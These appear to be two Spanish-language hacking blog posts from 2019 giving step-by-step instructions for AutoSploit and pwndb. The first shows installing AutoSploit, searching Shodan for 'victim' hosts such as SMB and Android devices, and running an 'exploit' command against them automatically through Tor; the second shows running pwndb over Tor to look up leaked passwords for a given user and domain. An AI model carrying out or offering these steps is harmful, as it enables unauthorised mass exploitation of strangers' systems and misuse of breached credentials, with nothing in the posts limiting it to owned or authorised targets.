viernes, 15 de febrero de 2019

Autosploit


Hola amigos.

En esta ocasión, os presento la herramienta Autosploit.

Esta herramienta, nos permitirá, automáticamente, lanzar los exploits hacia un objetivo, sin que nosotros tengamos que hacer casi nada, sólo buscar un objetivo y ponerlo.

Por si fuera poco, esta herramienta nos ayuda a buscar víctimas a través de shodan y censys, por lo que es necesario tener una cuenta de ambas. Y, cuando lo pida, meter los parámetros.

Descargamos la herramienta:




cd AutoSploit

./install.sh





python autosploit.py



Respondemos y

Y metemos los tokens tanto de shodan y de censys.

Si queremos buscar víctimas con shodan, por ejemplo:

search shodan android



Te dará un archivo hosts.txt con los hosts encontrados.

Bien, ahora busquemos

search shodan smb

Busquemos una dirección de hosts.txt y pongamos

exploit IPVICTIMA IP_ATACANTE LPORT

Y automáticamente lanzará exploits



Si queréis poner un proxy (por ejemplo habéis instalado tor https://salamancageek.blogspot.com/2016/03/intalando-tor.html) y os dá problemas, lo que tenéis que hacer es iniciar tor y privoxy e ir a la configuración de red de vuestro KALI LINUX u otra distribución GNU/LINUX y hacer pasar todas las conexiones por el proxy.



sábado, 2 de febrero de 2019

pwndb

 
Hola amigos:

En el post de hoy, vamos a ver las contraseñas de usuarios de internet.
Existen bases de datos de usuarios y contraseñas que se han ido sacando del hackeo de distintas plataformas o usuarios. Con esta aplicación podremos acceder a una de las primeras.

Nos descargamos el script

git clone https://github.com/davidtavarez/pwndb.git




Nos metemos en el directorio creado

Instalamos:

apt-get install virtualenv

Tecleamos: 

virtualenv venv

Running virtualenv with interpreter /usr/bin/python2
New python executable in /root/pwndb/env/bin/python2
Also creating executable in /root/pwndb/env/bin/python
Installing setuptools, pkg_resources, pip, wheel...done.

Nos metemos en /venv/bin/activate

Tecleamos:
 
source activate

Y nos aparecerá a la izquierda (env).

Ahora pon lo siguiente:

(env) root@kali:~/pwndb/env/bin# pip install -r /root/pwndb/requirements.txt

DEPRECATION: Python 2.7 will reach the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 won't be maintained after that date. A future version of pip will drop support for Python 2.7.
Collecting PySocks==1.6.8 (from -r /root/pwndb/requirements.txt (line 1))
Downloading https://files.pythonhosted.org/packages/53/12/6bf1d764f128636cef7408e8156b7235b150ea31650d0260969215bb8e7d/PySocks-1.6.8.tar.gz (283kB)
100% |████████████████████████████████| 286kB 4.4MB/s
Building wheels for collected packages: PySocks
Building wheel for PySocks (setup.py) ... done
Stored in directory: /root/.cache/pip/wheels/22/5c/b5/12e0dfdfa85bea67b23628b6425fae715c687e947a45ee3df9
Successfully built PySocks
Installing collected packages: PySocks
Successfully installed PySocks-1.6.8

Volvemos al directorio /root/pwndb/
cd /root/pwnd/

inicia tor:

service tor start
service privoxy start

Ahora ejecuta:

python pwndb.py -u usuario -d dominio

A partir de ahora, puedes ejecutar pwndb.py solamente con python pwndb.py, sin tener que hacer source activate ni nada.

Si te sale el error:

socks.ProxyConnectionError: Error connecting to SOCKS5 proxy 127.0.0.1:9150: [Errno 111] Connection refused
edita pwndb.py y busca
socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, "127.0.0.1", 9150)

Cámbia 9150 por 9050 (que será el puerto que tengas de tor para socks5)

Guarda y cierra.